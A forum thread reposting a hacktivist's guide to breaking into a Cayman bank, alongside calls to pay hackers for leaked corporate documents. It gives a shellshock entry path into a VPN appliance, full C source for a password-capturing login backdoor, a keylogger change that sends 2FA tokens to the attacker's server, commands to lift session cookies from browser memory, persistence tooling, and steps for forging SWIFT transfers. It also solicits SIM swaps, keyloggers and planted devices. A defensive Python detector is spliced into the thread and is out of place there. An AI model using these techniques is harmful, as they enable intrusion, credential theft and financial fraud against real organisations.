    [12] https://blog.sublimesecurity.com/red...pear-phishing/

    [12 - Recommended Reading]
     _______________________________________
    / When the scientific level of a world  \
    | far exceeds its level of solidarity,  |
    \ that world destroys itself.           /
     --------------------------------------
        \         _.---._    .            .
     *   \.'           '.       *
       *   _.-~===========~-._
        .  (___________________)       .   *
     .'          \_______/          .'
                                  .'
                                .'
                               '
                         - me

    Almost all hacking today is done by black hat hackers, for personal gain; or by white hat hackers, for the benefit of the shareholders (and in defense of the banks, companies and states that are annihilating us and the planet in which we live); and by military and intelligence agencies, as part of their war and conflict agenda. Seeing that this our world is already at the limit, I have thought that, in addition to these technical tips for learning to hack, I should include some resources that have been very important for my development and have guided me in the use of my hacking knowledge.
    * Ami: El Niño de las Estrellas – Enrique Barrios
    * La Anarquía Funciona: https://es.theanarchistlibrary.org/l...rquia-funciona
    * Viviendo Mi Vida – Emma Goldman
    * The Rise and Fall of Jeremy Hammond, Enemy of the State: https://www.rollingstone.com/culture...-state-183599/
      This guy and the HBGary hack were an inspiration
    * Días de Guerra, Noches de Amor – Crimethinc
    * Momo – Michael Ende
    * Cartas a un joven poeta – Rilke
    * Dominion (Documentary)
      "We cannot believe that, if we do not look, what we do not want to see will not happen" - Tolstoy in Первая ступень
    Bash Back!

    [13 - Heal]
    The hacker world has a high incidence of depression, suicides and certain battles with mental health. I don't think it's because of hacking, but because of the kind of environment that hackers mostly come from. Like many hackers, I grew up with little human contact: I was a girl raised by the internet. I have my struggles with depression and emotional numbness. Willie Sutton is frequently quoted as saying that he robbed banks because "that's where the money is," but the quote is incorrect. What he really said was:

        Why did I rob banks? Because I enjoyed it. I loved to do it. I was more alive when I was inside a bank, in full robbery, than at any other time in my life. I enjoyed it so much that one or two weeks later I was already looking for the next opportunity. But for me money was a minutiae, nothing more.

    Hacking has made me feel alive. It started as a way to self-medicate depression. Later I realized that, in reality, I could do something positive. I don't regret the way I grew up at all, it brought several beautiful experiences to my life. But I knew I couldn't continue living that way. So I began to spend more time away from my computer, with other people, learning to open myself to the world, to feel my emotions, to connect with others, to accept risks and be vulnerable. Things much harder than hacking, but at the mere hour the reward is more worth it.
    It is still an effort, but even if it is slow and wobbly, I feel that I am on my way.

    Hacking, done with conscience, can also be what heals us. According to Mayan wisdom, we have a gift granted by nature, which we must understand to put it at the service of the community. In [1], it is explained:

        When a person does not accept his job or mission he begins to suffer from seemingly incurable diseases; although he does not die in a short time, but only suffers, in order to wake up or become aware. That is why it is essential that a person who has acquired the knowledge and does his work in the communities must pay his Toj and maintain constant communication with the Creator and his ruwäch q’ij, since he constantly needs their strength and energy. Otherwise, the diseases that caused him to react or take the job could cause damage again.

    If you feel that hacking is feeding your isolation, depression, or other conditions, breathe. Give yourself some time to meet and become aware. You deserve to live happily, with health and fullness.

     ________________________
    < All Cows Are Beautiful >
     ------------------------
            \
             \ ^__^
               (oo)\_______
            (  (__)\       )\/\
             _) /  ||----w |
            (.)/   ||     ||
             `'

    [1] Ruxe’el mayab’ K’aslemäl: Raíz y espíritu del conocimiento maya https://www.url.edu.gt/publicaciones....ashx?Id=41748

    [14 - The Bug Hacktivist Program]
    It seems to me that hacking to get and leak documents of public interest is one of the best ways in which hackers can use their skills for the benefit of society. Unfortunately for us hackers, as in almost every category, the perverse incentives of our economic system do not coincide with what benefits society. So this program is my attempt to make it possible for good hackers to earn a living in an honest way by revealing material of public interest, instead of having to go selling their work to the cybersecurity, cybercrime or business industries.
    Cyberwar

    Some examples of companies whose leaks I would love to pay for are:
    - the mining, logging and livestock companies that plunder our beautiful Latin America (and kill land and territory defenders trying to stop them)
    - companies involved in attacks on Rojava such as Baykar Makina or Havelsan
    - surveillance companies such as the NSO group
    - war criminals and birds of prey such as Blackwater and Halliburton
    - private penitentiary companies such as GeoGroup and CoreCivic / CCA, and corporate lobbyists such as ALEC

    Pay attention when choosing where to investigate. For example, it is well known that oil companies are evil: they get rich at the cost of destroying the planet (and back in the 80s the companies themselves already knew about the consequences of their activity [1]). But if you hack them directly, you will have to dive into an incredible amount of boring information about your daily operations. Very likely it will be much easier for you to find something interesting if instead you focus on your lobbyists [2]. Another way to select viable goals is to read stories of investigative journalists (such as [3]), which are interesting but lack solid evidence. And that is exactly what your hacks can find.

    I will pay up to 100 thousand USD for each filtration of this type, according to the public interest and impact of the material, and the labor required in the hacking. Needless to say, a complete leak of the documents and internal communications of any of these companies will be a benefit for society that exceeds those one hundred thousand, but I am not trying to enrich anyone. I just want to provide enough funds so that hackers can earn a decent living doing a good job. Due to time constraints and safety considerations I will not open the material, nor inspect it for myself, but I will read what the press says about it once it has been published, and I will make an estimate of the public interest from there.
    My contact information is at the end of the guide mentioned above [4].

    How you get the material is your thing. You can use the traditional hacking techniques outlined in this guide and the previous one [4]. You could do a sim swap [5] on a corrupt businessman or politician, and then download his emails and backups from the cloud. You can order an IMSI catcher from alibaba and use it outside its offices. You can do some war-driving (the old way or the new [6]). You may be a person within your organizations that already has access. You can opt for a low-tech old-school style like in [7] and [8], and simply sneak into their offices. Whatever works for you.

    [1] https://www.theguardian.com/environm...hange-warnings
    [2] https://theintercept.com/2019/08/19/...line-protests/
    [3] https://www.bloomberg.com/features/2...-una-eleccion/
    [4] https://www.exploit-db.com/papers/41914
    [5] https://www.vice.com/en_us/article/v...tagram-bitcoin
    [6] https://blog.rapid7.com/2019/09/05/t...s-my-keyboard/
    [7] https://en.wikipedia.org/wiki/Citize...tigate_the_FBI
    [8] https://en.wikipedia.org/wiki/Unnecessary_Fuss

    [14.1 - Partial payments]
    Are you a good-hearted waitress working in a company of evil [1]? Would you be willing to sneak a physical keylogger into an executive's computer, change your USB charging cable for a modified one [2], hide a microphone in a meeting room where you plan your atrocities, or leave one of these [5] forgotten in some corner of the offices?

    [1] https://en.wikipedia.org/wiki/Evil_maid_attack
    [2] http://mg.lol/blog/defcon-2019/
    [3] https://shop.hak5.org/products/lan-turtle

    Are you good with social engineering and phishing, and did you get a shell on an employee's computer, or did you get your vpn credentials using phishing? But maybe you couldn't get domain admin and download what you wanted?

    Did you participate in bug bounties programs and become an expert in web application hacking, but don't have enough hacker experience to completely penetrate the company?
    Do you have facility with reverse engineering? Scan some evil companies to see what devices they have exposed to the internet (firewall, VPN, and email gateways will be much more useful than things like IP cameras), apply reverse engineering and find some exploitable vulnerability remotely.

    If I can work with you to penetrate the company and get material of public interest, you will also be rewarded for your work. If I don't have the time to work on it myself, at least I will try to advise you on how to continue until you can complete the hacking on your own.

    Supporting those in power to hack and monitor dissidents, activists and the general population is today an industry of several billion dollars, while hacking and exposing those in power is a voluntary and risky job. Turning it into a multi-million dollar industry will certainly not fix that power imbalance, nor will it solve the problems of society. But I think it will be fun. So ... I want to see people starting to collect their rewards!

    [15 - Abolish prisons]
    Built by the enemy to enclose ideas enclosing companions to silence war cries it is the center of torture and annihilation where the human being becomes more violent It is the reflection of society, repressive and prison sustained and based on authoritarian logic repressed and guarded custodians thousands of dams and prisoners are exterminated before this schizophrenic and ruthless machine companion Axel Osorio giving the strip in the cane breaking the isolation and silencing fire and war to jail, we are destroying!

    Rap Insurgent - Words In Conflict

    It would be typical to end a hacker zine saying release hammond, release manning, release hamza, release detainees by mounting the дело Сети, etc. I am going to take this tradition to its most radical consequence [1], and to say: we must abolish prisons now! Being a criminal myself, they may think that what happens is that I have a slightly skewed view of the matter.
    But seriously, it is not even a controversial issue, even the UN almost agrees [2]. So, once and for all, free migrants [3][4][5][6], often imprisoned by those same countries that created the war and the environmental and economic destruction they are fleeing from. Free all those in prison because of the war against those who use drugs [7]. Free all people imprisoned in the war against the poor [8]. All prisons do is hide and ignore the proof of the existence of social problems, instead of fixing them. And until everyone is released, fight the prison system by remembering and keeping in mind those who are trapped in there. Send them honey, letters, helicopters [9], pirate radios [10] and books, and support those who organize from there with [11][12].

    [1] http://www.bibliotecafragmentada.org...ones-final.pdf
    [2] https://www.unodc.org/pdf/criminal_j...prisonment.pdf
    [3] https://www.theguardian.com/us-news/...anta-wish-list
    [4] https://www.theguardian.com/us-news/...tucson-arizona
    [5] https://www.playgroundmag.net/now/de..._22648665.html
    [6] https://www.nytimes.com/2019/06/26/w...s-suicide.html
    [7] https://en.wikiquote.org/wiki/John_Ehrlichman#Quotes
    [8] VI, 2. i. The Unpaid Fine: https://scielo.conicyt.cl/scielo.php...22012000100005
    [9] p. 10, Libel Nº2. Political bulletin from the High Security Prison
    [10] https://itsgoingdown.org/transmissio...ile-territory/
    [11] https://freealabamamovement.wordpres...et-who-we-are/
    [12] https://incarceratedworkers.org/

    [16 - Conclusion]
    Our world is upside down [1]. We have a justice system that represents injustice. The law and order are there to create an illusion of social peace, and hide the systematic and profound exploitation, violence, and injustice. Better follow your conscience, and not the law.

    [1] http://resistir.info/livros/galeano_patas_arriba.pdf

    Businessmen enrich themselves by mistreating people and the planet, while care work is largely unpaid.
    Through the assault on everything communal, we have somehow raised densely populated cities, plagued by loneliness and isolation. The cultural, political and economic system in which we live encourages the worst facets of human nature: greed, selfishness and self-centeredness, competitiveness, lack of compassion and attachment to authority. So, for those who have managed to remain sensitive and compassionate in a cold world, for all the everyday heroines that practice goodness in small things, for all of you who still have a star burning in your hearts: гоpи, гоpи ясно, чтобы не погасло!

     _____________________
    <Let's sing together! >
     ---------------------
            \
             \ ^__^
               (oo)\_______
            (  (__)\       )\/\
             _) /  ||----w |
            (.)/   ||     ||

    Open heart
    Open feeling
    Open understanding
    Leave reason aside
    And let the sun hidden inside you shine

    We were born at night. We live in it, we hack in it.

    Here we are, we are the rebel dignity, the forgotten heart of the Интернет.
    Our fight is for memory and justice, and the bad government is filled with criminals and murderers.

    Our fight is for fair and decent work, and bad government and corporations buy and sell zero days.

    For all tomorrow. For us the happy rebellion of the leaks and expropriation.

    For all everything. For us nothing.

    From the mountains of the Cyber Southeast,

     _   _            _      ____             _    _
    | | | | __ _  ___| | __ | __ )  __ _  ___| | _| |
    | |_| |/ _` |/ __| |/ / |  _ \ / _` |/ __| |/ / |
    |  _  | (_| | (__|   <  | |_) | (_| | (__|   <|_|
    |_| |_|\__,_|\___|_|\_\ |____/ \__,_|\___|_|\_(_)
    Last edited by Blastolabs; 23rd March 2023 at 01:34.

  6. The Following 5 Users Say Thank You to Blastolabs For This Post:

    Ewan (23rd March 2023), ExomatrixTV (23rd March 2023), Harmony (23rd March 2023), RatRodRob...RRR (23rd March 2023), ronny (23rd March 2023)
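    Section 5 of the guide quoted in the post above describes a three-person create / verify / authorize control on SWIFT MT103 messages that stopped working once one intruder held all three users' credentials. As an added example (not part of the original post or of the guide), this is a detection that flags released payments whose approval steps share a user or a source workstation, skip a step, or complete faster than three people plausibly would; the audit-log format, field names and the 5-minute threshold are assumptions.

```python
import csv
import io
from collections import defaultdict
from datetime import datetime, timedelta

STEPS = ("create", "verify", "authorize")

# Constructed sample log (the format is an assumption for this example):
# timestamp, payment reference, workflow step, acting user, source workstation
SAMPLE_LOG = """\
2024-03-04T09:02:11,PAY-1001,create,alice,WS-014
2024-03-04T09:40:37,PAY-1001,verify,bob,WS-022
2024-03-04T11:15:02,PAY-1001,authorize,carol,WS-031
2024-03-04T23:10:04,PAY-1002,create,alice,WS-022
2024-03-04T23:12:19,PAY-1002,verify,bob,WS-022
2024-03-04T23:13:40,PAY-1002,authorize,carol,WS-022
2024-03-05T10:00:00,PAY-1003,create,dave,WS-014
2024-03-05T10:30:00,PAY-1003,verify,dave,WS-014
2024-03-05T14:00:00,PAY-1003,authorize,carol,WS-031
2024-03-05T15:00:00,PAY-1004,create,alice,WS-014
2024-03-05T15:01:00,PAY-1004,verify,bob,WS-022
2024-03-05T15:02:30,PAY-1004,authorize,carol,WS-031
2024-03-05T16:00:00,PAY-1005,create,alice,WS-014
2024-03-05T16:20:00,PAY-1005,verify,bob,WS-022
2024-03-05T17:00:00,PAY-1006,create,alice,WS-014
2024-03-05T18:00:00,PAY-1006,authorize,carol,WS-031
"""


def parse(log_text):
    """Group audit events by payment reference, skipping malformed lines."""
    payments = defaultdict(list)
    for row in csv.reader(io.StringIO(log_text)):
        if len(row) != 5:
            continue
        ts, ref, step, user, host = (field.strip() for field in row)
        if step not in STEPS:
            continue
        try:
            when = datetime.fromisoformat(ts)
        except ValueError:
            continue
        payments[ref].append((when, step, user.lower(), host.upper()))
    return payments


def analyze(log_text, rapid=timedelta(minutes=5)):
    """Return {payment_ref: [finding, ...]} for payments that were authorized."""
    findings = {}
    for ref, events in parse(log_text).items():
        events.sort()
        by_step = {step: user for _, step, user, _ in events}
        if "authorize" not in by_step:
            continue  # never released, nothing left the bank

        flags = set()
        # A step of the three-person workflow never happened.
        if any(step not in by_step for step in STEPS):
            flags.add("MISSING_STEP")
        # One account performed more than one of the steps.
        if len(set(by_step.values())) < len(by_step):
            flags.add("SAME_USER")
        # Different accounts acting from one workstation: what replayed
        # credentials from a single foothold look like in the audit trail.
        host_users = defaultdict(set)
        for _, _, user, host in events:
            host_users[host].add(user)
        if any(len(users) > 1 for users in host_users.values()):
            flags.add("SHARED_HOST")
        # The full chain finished faster than three people handing off work.
        if "MISSING_STEP" not in flags and events[-1][0] - events[0][0] <= rapid:
            flags.add("RAPID_CHAIN")

        if flags:
            findings[ref] = sorted(flags)
    return findings


if __name__ == "__main__":
    for ref, flags in sorted(analyze(SAMPLE_LOG).items()):
        print(ref, ", ".join(flags))
```

    The source-workstation field only helps if it is recorded by the payment application or gateway itself rather than reported by the client.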

  7. Link to Post #4
    Aaland Avalon Member Blastolabs's Avatar
    Join Date
    3rd November 2020
    Language
    English
    Posts
    442
    Thanks
    1,649
    Thanked 3,352 times in 432 posts

    Default Re: Crime Theorists 'Crowdsourcing Network' Gaining Momentum?

    ^^^

    Open heart
    Open feeling
    Open understanding
    Leave reason aside
    And let the sun hidden inside you shine
    perl -Mre=eval

  8. The Following User Says Thank You to Blastolabs For This Post:

    ExomatrixTV (23rd March 2023)

  9. Link to Post #5
    Avalon Member
    Join Date
    26th May 2010
    Location
    Albuquerque, NM, USA
    Age
    73
    Posts
    2,450
    Thanks
    11,327
    Thanked 22,062 times in 2,419 posts

    Default Re: Crime Theorists 'Crowdsourcing Network' Gaining Momentum?

    Quote Posted by Blastolabs (here)
    The best real world example I am familiar with is Phineas Phisher.

    Why?

    Well in just a few weeks of human perceived time he hacked the CIA, hacked the NSA, then stole a couple hundred thousand dollars from a bank in the Cayman Islands

    Why?

    Quote:
    Make no mistake, expropriation is not theft. It is not the confiscation of money earned "with the sweat of the forehead". It is not theft of private property. It is, rather, the recovery of enormous amounts of land and wealth that have been forged with stolen natural resources, human slavery, forced labor force and amassed in hundreds of years by a small minority. This wealth ... is illegitimate, both for moral purposes and for the exploitation mechanisms that have been used to create it.
    For Colin, the first step is that “we have to free ourselves from our mental ties (believing that wealth and private property have been earned by those who monopolize them; and that, therefore, they should be something to respect, revere, and even something to pursue), open our minds, study and learn from history, and recognize this illegitimacy together”. Here are some books that have helped me with this: [7] [8] [9] [10] [11].

    According to Barack Obama, economic inequality is "the challenge that defines our time." Computer hacking is a powerful tool to combat economic inequality.

    The former director of the NSA, Keith Alexander, agrees and says that hacking is responsible for "the greatest transfer of wealth in history."

     ______________________________
    / The story is ours            \
    \ and it is done by hackers!   /
     ----------------------------
            \
             \ ^__^
               (oo)\_______
            (  (__)\       )\/\
             _) /  ||----w |
            (.)/   ||     ||
             `'

    Everyone together, now and forever!

    [1] https://sursiendo.com/docs/Pensar_de...omunes_web.pdf
    [2] https://chomsky.info/commongood02/
    [3] The Will to Change: Men, Masculinity, and Love
    [4] their own religion is very clear about this: https://dailyverses.net/es/materialismo
    [5] https://elpulso.hn/la-filantropia-en...l-capitalismo/
    [6] http://www.hamptoninstitution.org/ex...n-or-bust.html
    [7] Manifiesto por una Civilización Democrática. Volumen 1, Civilización: La Era de los Dioses Enmascarados y los Reyes Cubiertos
    [8] Calibán y la Bruja
    [9] En deuda: Una historia alternativa de la economía
    [10] La otra historia de los Estados Unidos
    [11] Las venas abiertas de América Latina

    why/HOW?

    Code:
      _______________________________
           < Our weapons are our keyboards >
            --------------------------------
                      \
                       \ ^__^
                         (oo)\_______
                      (  (__)\       )\/\
                       _) /  ||----w |
                      (.)/   ||     ||
                       `'    ^^     ^^
     [2 - Introduction]
    This guide explains how I hacked the Cayman Bank and Trust Company (Isle of Man).  Why am I publishing this, almost four years later?
     1) To show what is possible
    Hackers working for social change have limited themselves to developing security and privacy tools, DDoS, performing vandalism and leaks. Wherever you go, there are radical projects for a social change in a complete state of precariousness, and there would be much that they could do with some expropriated money. At least for the working class, bank robbery is something socially accepted, and those who do are seen as heroes of the people. In the digital age, robbing a bank is a non-violent, less risky act, and the reward is greater than ever. So why are only black hat hackers doing it for their personal benefit, and never hacktivists to finance radical projects? Maybe they don't think they are capable of doing it. The big bank hacks are on the news every so often, such as the hacking of the Bank of Bangladesh [1], which was attributed to North Korea, or the hacking of banks attributed to the Carbanak group [2], which they describe as a very large and well organized group of Russian hackers, with different members who would be specialized in different tasks. But, it is not that complicated.
    
    It is because of our collective belief that the financial system is unquestionable that we exercise control over ourselves, and maintain the class system without those above having to do anything [3]. Being able to see how vulnerable and fragile the financial system really is helps us break that collective hallucination. That is why banks have a strong incentive not to report hacks, and to exaggerate how sophisticated the attackers are. None of the financial hacks I made, or those I've known, have ever been reported. This is going to be the first, and not because the bank wanted to, but because I decided to publish it.
    
    As you are about to learn in this home guide, hacking a bank and transferring money through the SWIFT network does not require the support of any government or a large and specialized group.  It is something totally possible being a mere amateur hacker, with only public tools and basic knowledge of how to write a script.
    [1] https://elpais.com/economia/2016/03/...94_374693.html 
    [2] https://securelist.lat/el-gran-robo-...arbanak/67508/ 
    [3] https://es.wikipedia.org/wiki/Hegemon%C3%ADa_cultural 
     2) Help withdraw cash
    Many of those who read this already have, or with a little study will be able to acquire, the skills needed to carry out a hack like this. 
    However, many will find that they lack the necessary criminal connections to get the handles in condition. In my case, this was the first bank that I hacked, and at that time I only had a few and mediocre accounts ready to withdraw the cash (known as bank drops), so it was only a few hundred thousand that I could withdraw in total, when it is normal to get millions. Now, on the other hand, I do have the knowledge and connections to get cash more seriously, so if you are hacking a bank but need help to convert that into real money, and you want to use that money to finance radical social projects, you can contact me.
    
     3) Collaborate
    It is possible to hack banks as an amateur who works alone, but the net is that, in general, it is not as easy as I paint it here.  I was lucky with this bank for several reasons:
    1. It was a small bank, so it took me much less time to understand how everything worked.
    2. They had no procedure to check the sent swift messages.  Many banks have one, and you need to write code to hide your transfers from their monitoring system.
    3. They only used password authentication to access the application with which they connected to the SWIFT network. Most banks now use RSA SecurID, or some form of 2FA.  You can skip this by typing code to get an alert when your token enters, so you can use it before it expires. It's simpler than it seems: I used Get-Keystrokes [1], modifying it so that instead of storing the pressed keys, a GET request is made to my server every time it is detected that they have entered a username. This request adds the username to the url and, as they type the token, several GETs are made with the token digits concatenated to the url. On my side I leave this running in the meantime:
      ssh me@my_secret_server 'tail -f /var/log/apache2/access_log'
        | while read i; do echo $i; aplay alarma.wav &> /dev/null; done
     If it is a web application, you can skip the 2FA by stealing the cookie after they have authenticated. I am not an APT with a team of coders who can make me customized tools. I am a simple person who subsists on what the terminal gives [2], so what I use is:
    procdump64 /accepteula -r -ma PID_of_browser
     strings64 /accepteula * .dmp |  findstr PHPSESSID 2> nul
     or going through findstr rather than strings, which makes it much faster:
    findstr PHPSESSID * .dmp> tmp
         strings64 /accepteula tmp |  findstr PHPSESSID 2> nul
    
    Another way to skip it is to access your session with a hidden VNC (hvnc) after they have authenticated, or with a little creativity you could also focus on another part of their process instead of sending SWIFT messages directly.
    
    I think that if I collaborated with other experienced bank hackers we could hack hundreds of banks like Carbanak, instead of doing one from time to time on my own.  So if you have experience with similar hacks and want to collaborate, contact me.  You will find my email and my PGP key at the end of the previous guide [3].
    
    [1] https://github.com/PowerShellMafia/P...Keystrokes.ps1
    [2] https://lolbas-project.github.io/
    [3] https://www.exploit-db.com/papers/41914
    ________________________________________
    / If robbing a bank could change things, \
    \ they’d make it illegal.                /
     ----------------------------------------
             \
              \ ^__^
                (oo)\_______
             (  (__)\       )\/\
              _) /  ||----w |
             (.)/   ||     ||
    
    
    [3 - Be careful out there]
    It is important to take some simple precautions. I will refer to this same section of my last guide [1], since it seems to work just fine [2]. All I have to add is that, in Trump's words, "Unless you catch hackers in the act, it is difficult to determine who was doing the hacking," so the police are getting more and more creative [3][4] in their attempts to grab criminals in the act (when their encrypted hard drives are unlocked). So it would be nice if for example you carry a certain bluetooth device and configure your computer to turn off when it moves beyond a certain range, or when an accelerometer detects movement, or something like that. It may be that writing long articles detailing your actions and your ideology is not the safest thing in the world (oops!), but at times I feel I have to.

    If I didn't believe in who listens to me
    If I didn't believe in what hurts
    If I didn't believe in what's left
    If I didn't believe in what I fought
    What a thing ...
    What was the club without a quarry?

    [1] https://www.exploit-db.com/papers/41914
    [2] https://www.wifi-libre.com/topic-126...as-fisher.html
    [3] https://www.wired.com/2015/05/silk-road-2/
    [4] https://motherboard.vice.com/en_us/a...y-arrest-video

    Many blame queer people for the decline of this society;
    we are proud of it
    Some believe we want to reduce to ashes
    this civilization and its moral fabric;
    They couldn't be more right
    They often describe us as depraved, decadent and revolting
    But alas! They haven't seen anything yet
    (https://theanarchistlibrary.org/libr...e-gay-do-crime)

    [4 - Get access]
    In another place [1] I talked about the main ways to get initial access to a company's network during a targeted attack. However, this was not a targeted attack. I did not set out to hack a specific bank, what I wanted was to hack any bank, which ends up being a much simpler task. This type of nonspecific approach was popularized by Lulzsec and Anonymous [2].
    As part of the earlier essay, I prepared an exploit and post-exploitation tools for a popular VPN device. Then I started scanning the entire internet with zmap and zgrab to identify other vulnerable devices [3]. I had the scanner save the vulnerable IPs, along with the common and alt names of the device's SSL certificate, the device's Windows domain names, and the reverse DNS lookup of the IP. I grepped the results for the word "bank", and there were plenty to choose from, but the truth is that I was attracted to the word "Cayman", and that's how I came to choose this one.

    [1] https://www.exploit-db.com/papers/41914
    [2] https://web.archive.org/web/20190329...org/0x0098.png
    [3] https://github.com/zmap/zmap

    [4.1 - The Exploit]
    When I published my latest DIY guide [1] I did not reveal the details of the sonicwall exploit that I had used to hack Hacking Team, as it was very useful for other hacks (such as this one) and I still had not finished having fun with it. Determined then to hack Hacking Team, I spent weeks reverse engineering their sonicwall ssl-vpn model, and even managed to find several memory corruption vulnerabilities that were more or less difficult to exploit, before I realized that the device was easily exploitable with shellshock [2]. When shellshock came out, many sonicwall devices were vulnerable, with only a request to cgi-bin/welcome and a payload in the user-agent. Dell released a security update and an advisory for these versions. The version used by Hacking Team and this bank had the vulnerable bash version, but the cgi requests did not trigger the shellshock - except for the requests to a shell script, and there was one accessible: cgi-bin/jarrewrite.sh. This seems to have escaped Dell's notice, since they never released a security update or an advisory for that version of the sonicwall. And, kindly, Dell had setuid’d root on dos2unix, leaving the device easy to root.
    In my last guide many read that I spent weeks researching a device until I found an exploit, and assumed that it meant that I was some kind of elite hacker. The reality, that is, the fact that it took me two weeks to realize that it was trivially exploitable with shellshock, is perhaps less flattering to me, but I think it is also more inspiring. It shows that you can really do this for yourself. You don't need to be a genius, I certainly am not. Actually my work against Hacking Team started a year earlier. When I discovered Hacking Team and the Gamma Group in the CitizenLab investigations [3][4], I decided to explore a bit and see if I could find anything. I didn't get anywhere with Hacking Team, but I was lucky with Gamma Group, and I was able to hack their customer support portal with basic sql injection and file upload vulnerabilities [5][6]. However, although the customer support server gave me a pivot towards the internal network of Gamma Group, I was unable to penetrate further into the company.
    From this experience with the Gamma Group and other hacks, I realized that I was really limited by my lack of knowledge about privilege escalation and lateral movement in windows domains, active directory and windows in general. So I studied and practiced (see section 11), until I felt I was ready to pay a visit to Hacking Team almost a year later. The practice paid off, and this time I was able to make a complete commitment from the company [7]. Before I realized that I could enter with shellshock, I was willing to spend happy whole months of life studying exploit development and writing a reliable exploit for one of the memory corruption vulnerabilities I had encountered. I just knew that Hacking Team needed to be exposed, and that it would take me as much time as necessary and learn what I had to learn to get it. To perform these hacks you don't need to be bright. You don't even need great technical knowledge. You just need dedication, and believe in yourself.
    [1] https://www.exploit-db.com/papers/41914 [2] https://es.wikipedia.org/wiki/Shells...or_de_software) [3] https://citizenlab.ca/tag/hacking-team/ [4] https://citizenlab.ca/tag/finfisher/ [5] https://theintercept.com/2014/08/07/...ng-protesters/ [6] https://www.exploit-db.com/papers/41913 [7] https://web.archive.org/web/20150706...om/hackingteam [4.2 - The Backdoor] Part of the backdoor I prepared for Hacking Team (see the first footnote in section 6) was a simple wrapper on the login page to capture passwords: #include <stdio.h> #include <unistd.h> #include <fcntl.h> #include <string.h> #include <stdlib.h> int main() { char buf[2048]; int nread, pfile; /* pull the log if we send a special cookie */ char *cookies = getenv("HTTP_COOKIE"); if (cookies && strstr(cookies, "our private password")) { write(1, "Content-type: text/plain\n\n", 26); pfile = open("/tmp/.pfile", O_RDONLY); while ((nread = read(pfile, buf, sizeof(buf))) > 0) write(1, buf, nread); exit(0); } /* the parent stores the POST data and sends it to the child, which is the actual login program */ int fd[2]; pipe(fd); pfile = open("/tmp/.pfile", O_APPEND | O_CREAT | O_WRONLY, 0600); if (fork()) { close(fd[0]); while ((nread = read(0, buf, sizeof(buf))) > 0) { write(fd[1], buf, nread); write(pfile, buf, nread); } write(pfile, "\n", 1); close(fd[1]); close(pfile); wait(NULL); } else { close(fd[1]); dup2(fd[0],0); close(fd[0]); execl("/usr/src/EasyAccess/www/cgi-bin/.userLogin", "userLogin", NULL); } } In the case of Hacking Team, they were logging on to the VPN with single-use passwords, so the VPN gave me access only to the network, and from there it took an extra effort to get domain admins on their network. In the other guide I wrote about side passes and privilege escalation in windows domains [1]. In this case, on the other hand, it was the same Windows domain passwords that were used to authenticate against the VPN, so I could get a good user password, including that of the domain admin. 
    Now I had full access to his network, but usually this is the easy part. The most complicated part is to understand how they operate and how to get what you want out of their network.

    [1] https://www.exploit-db.com/papers/41914

    [4.3 - Fun facts]
    Following the investigation they did about the hacking, I found it interesting to see that, by the same time I did it, the bank could have been compromised by someone else through a targeted phishing email [1]. As the old saying goes, "give a man an exploit and he will have access for a day, teach phishing and he will have access all his life" [2]. The fact that someone else, by chance and at the same time as me, put this small bank in the spotlight (they registered a domain similar to the real domain of the bank to be able to phish from there) suggests that bank hacks occur much more frequently than is known.

    A fun suggestion for you to follow the investigations of your hacks is to have a backup access, one that you won't touch unless you lose normal access. I have a simple script that expects commands once a day, or less, just to maintain long-term access in case they block my regular access. Then I had a powershell empire [3] calling home more frequently to a different IP, and I used empire to launch meterpreter [4] against a third IP, where I did most of my work. When PWC started investigating the hacking, they found my use of empire and meterpreter and cleaned those computers and blocked those IPs, but they didn't detect my backup access. PWC had placed network monitoring devices, in order to analyze the traffic and see if there were still infected computers, so I didn't want to connect much to their network. I only launched mimikatz once to get the new passwords, and from there I could continue my research by reading their emails in the outlook web access.

    [1] page 47, Project Pallid Nutmeg.pdf, in torrent
    [2] https://twitter.com/thegrugq/status/563964286783877121
    [3] https://github.com/EmpireProject/Empire
    [4] https://github.com/rapid7/metasploit-framework

    [5 - Understand Banking Operations]
    To understand how the bank operated, and how I could get money, I followed the techniques that I summarized in [1], in section “13.3 - Internal Recognition”. I downloaded a list of all file names, grepped for words like "SWIFT" and "transfer", and downloaded and read all files with interesting names. I also looked for emails from employees, but by far the most useful technique was to use keyloggers and screenshots to see how bank employees worked. I didn't know it at the time, but for this, Windows has a very good monitoring tool [2].

    As described in technique no. 5 of section 13.3 in [1], I made a capture of the keys pressed throughout the domain (including window titles), I did a grep in search of SWIFT, and found some employees opening ‘SWIFT Access Service Bureau - Logon’. For those employees, I ran meterpreter as in [3], and used the post/windows/gather/screen_spy module to take screenshots every 5 seconds, to see how they worked. They were using a remote citrix app from the bottomline company [4] to access the SWIFT network, where each payment message SWIFT MT103 had to go through three employees: one to "create" the message, one to "verify" it, and another to "authorize it." Since I already had all their credentials thanks to the keylogger, I could easily perform all three steps myself. And from what I knew after seeing them work, they didn't review the SWIFT messages sent, so I should have enough time to get the money from my bank drops before the bank realized and tried to reverse the transfers.

    [1] https://www.exploit-db.com/papers/41914
    [2] https://cyberarms.wordpress.com/2016...th-metasploit/
    [3] https://www.trustedsec.com/blog/no_psexec_needed/
    [4] https://www.bottomline.com/uk/produc...ccess-services

     _______________________________________
    / Whoever robs a thief, gets 100 years  \
    \ of forgiveness.                       /
     ---------------------------------------
            \
             \ ^__^
               (oo)\_______
            (  (__)\       )\/\
             _) /  ||----w |
            (.)/   ||     ||
             `'

    [6 - Send the money]
    I had no idea what I was doing, so I was discovering it along the way. Somehow, the first transfers I sent went well. The next day, I screwed up by sending a transfer to Mexico that ended my fun.

    This bank sent its international transfers through its correspondent account in Natwest. I had seen that the correspondent account for transfers in pounds sterling (GBP) appeared as NWBKGB2LGPL, while for the others it was NWBKGB2LXXX. The Mexican transfer was in GBP, so I assumed that I had to put NWBKGB2LGPL as a correspondent. If I had prepared it better I would have known that the GPL instead of XXX indicated that the payment would be sent through the UK Fast Payment Service, rather than as an international transfer, which obviously will not work when you are trying to send money to Mexico. So the bank got an error message. On the same day I also tried to send a payment of £200k to the UK using NWBKGB2LGPL, which was not made because 200k exceeded the shipping limit by fast payments, and would have had to use NWBKGB2LXXX instead. They also received an error message for this. They read the messages, investigated it, and found the rest of my transfers.

    [7 - The loot]
    From what I write, you can get a complete idea of what my ideals are and to what things I give my support. But I would not like to see anyone in legal trouble for receiving expropriated funds, so not another word of where the money went.
